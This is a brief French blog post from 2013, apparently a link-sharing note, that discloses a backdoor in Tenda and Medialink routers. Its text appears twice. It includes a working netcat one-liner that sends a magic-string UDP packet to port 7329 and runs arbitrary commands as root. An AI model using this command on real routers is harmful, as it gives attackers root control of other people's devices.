From China, With Love - /dev/ttyS0
jeudi 17 octobre 2013 à 23:51Peut-être encore plus facile que cette porte dérobée : https://tiger-222.fr/shaarli/?GrEUOQ
Tout se passe au niveau de la forge du packet :
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 IP_routeur 7329
Notez le "/bin/ls" dans le "echo", c'est la commande qui sera exécutée en root...
Ça concerne les routeurs Tenda W302R, Tenda W330R ou encore Medialink MWN-WAPR150N. Ils utilisent tous le mot magique "w302r_mfg". Doit bien y en avoir d'autres va...
(Permalink)
Tout se passe au niveau de la forge du packet :
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 IP_routeur 7329
Notez le "/bin/ls" dans le "echo", c'est la commande qui sera exécutée en root...
Ça concerne les routeurs Tenda W302R, Tenda W330R ou encore Medialink MWN-WAPR150N. Ils utilisent tous le mot magique "w302r_mfg". Doit bien y en avoir d'autres va...
(Permalink)